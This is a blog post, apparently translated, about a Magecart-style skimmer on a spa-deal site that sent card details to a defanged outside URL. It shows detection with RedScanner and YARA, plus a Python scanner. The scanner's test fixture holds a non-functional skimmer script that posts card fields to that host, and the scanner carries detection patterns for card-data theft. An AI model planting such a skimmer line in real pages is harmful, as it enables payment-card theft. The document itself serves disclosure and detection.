Recently, cyber attacks carried out by the Magecart group, which has become the nightmare of companies ranging from e-commerce companies (such as Newegg) to airlines (such as British Airways), ticketing companies (such as Ticketmaster and Biletix) and media companies (such as ABS-CBN), continue to affect our country and our citizens. These attacks have resulted not only in reputational damage but also in high penalties under laws and regulations such as GDPR and KVKK, as was the case with British Airways.
To move on to my story: in June 2019, Tarık Uygun (@uyguntt) contacted me via direct message on Twitter and said he had received a warning message from Akbank that suspicious transactions had been made with his credit card. (Cheers to the Akbank Fraud Risk Management Team. :) ) After he remembered that he had last used the card to make a purchase from a website that offers spa and massage deals, he found out through some research that when credit card information is entered, the information is hidden in the hash parameter and sent to https://kinitrofitness[.]com/wp-includes/class-wp-customize-settings.php. He decided to share this with me.
After looking a bit further, I clearly understood that this code was stealing the customer's credit card information (Number, Holder, HolderFirstName, HolderLastName, Date, Month, Year, CVV, Gate, Data, Sent, SaveParam). When I did a quick search on Google, I also found that it was similar to the code used in the hack of 962 sites using the Magento e-commerce platform that occurred in July.
As an example, when I ran the RedScanner tool on the target website with the command "scrapy runspider --nolog RedScanner.py -a "urls=xyz[.]com"", I found that it successfully detected the malicious code injected into the website using the existing YARA rules. Do not forget that you can also add your own rules to the YARA rules used by the RedScanner tool, which will help to increase the detection rate.
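The following is an added example, not the author's code and not part of RedScanner, showing in plain Python what a YARA-style rule for this skimmer checks: a script that references several of the card field names listed above and either ships data to a host outside the shop's own domain or packs it into a "hash" parameter. The site host ("shop.example") and both HTML pages are constructed for the example; the skimmer sample is deliberately non-functional and only reproduces the indicators named in the post (the field names and the defanged exfiltration URL). The scoring generalizes beyond the single case in the text, flagging any inline script with the same shape and any external script loaded from the known exfiltration host.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names the skimmer described in this post collected.
CARD_FIELDS = ("Number", "Holder", "HolderFirstName", "HolderLastName", "Date",
               "Month", "Year", "CVV", "Gate", "Data", "Sent", "SaveParam")

# Exfiltration host named in the post, defanged the same way as on the page.
KNOWN_EXFIL_HOSTS = {"kinitrofitness[.]com"}

URL_RE = re.compile(r"""https?://[^\s'"<>()]+""")
HASH_PARAM_RE = re.compile(r"\bhash\s*[=:]")


def refang(value):
    """Turn a defanged indicator ('a[.]b') back into a real hostname ('a.b')."""
    return value.replace("[.]", ".")


class _ScriptCollector(HTMLParser):
    """Collect inline <script> bodies and external script src URLs from a page."""

    def __init__(self):
        super().__init__()
        self.inline, self.external = [], []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def _foreign_hosts(urls, site_host):
    """Hostnames in urls that are neither the site itself nor one of its subdomains."""
    hosts = {urlparse(refang(u)).hostname for u in urls}
    return sorted(h for h in hosts
                  if h and h != site_host and not h.endswith("." + site_host))


def scan_page(html, site_host):
    """Return one finding per script that looks like a payment skimmer.

    An inline script is reported when it references at least three of the card
    field names and either talks to a host outside the site or packs data into
    a 'hash' parameter, which is the pattern the post describes.
    """
    collector = _ScriptCollector()
    collector.feed(html)
    known = {refang(h) for h in KNOWN_EXFIL_HOSTS}
    findings = []
    for index, body in enumerate(collector.inline):
        fields = [f for f in CARD_FIELDS if re.search(rf"\b{f}\b", body)]
        foreign = _foreign_hosts(URL_RE.findall(body), site_host)
        uses_hash = bool(HASH_PARAM_RE.search(body))
        if len(fields) >= 3 and (foreign or uses_hash):
            findings.append({
                "kind": "inline_script",
                "script_index": index,
                "card_fields": fields,
                "foreign_hosts": foreign,
                "hash_param": uses_hash,
                "known_exfil": any(h in known for h in foreign),
            })
    # External scripts served from a known exfiltration host are reported too.
    for src in collector.external:
        if urlparse(refang(src)).hostname in known:
            findings.append({"kind": "external_script", "src": src, "known_exfil": True})
    return findings


# Constructed samples. The skimmer page is non-functional on purpose
# (encode/post are undefined); it only carries the indicators named in the post.
BENIGN_PAGE = """<html><body>
<script>
  var ts = new Date();
  fetch("https://shop.example/api/track", {method: "POST", body: JSON.stringify({ts: ts})});
</script>
</body></html>"""

SKIMMER_PAGE = """<html><body>
<script>
  var h = encode({Number: n, Holder: o, HolderFirstName: f, HolderLastName: l,
                  Month: m, Year: y, CVV: c});
  post("https://kinitrofitness[.]com/wp-includes/class-wp-customize-settings.php?hash=" + h);
</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("skimmer", SKIMMER_PAGE)):
        print(name, scan_page(page, "shop.example"))
```

The benign page is not reported even though it mentions Date and posts to the site's own API, because a single field name on its own is too common to act on; the skimmer page trips every check at once, including the match against the host from the post. Thresholds like the "three field names" rule are the part worth tuning per shop, exactly as the text suggests tuning RedScanner's YARA rules.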
Note: I thank Zero Xyele, a Twitter user who pursued my case persistently for months, for pushing me to write this article.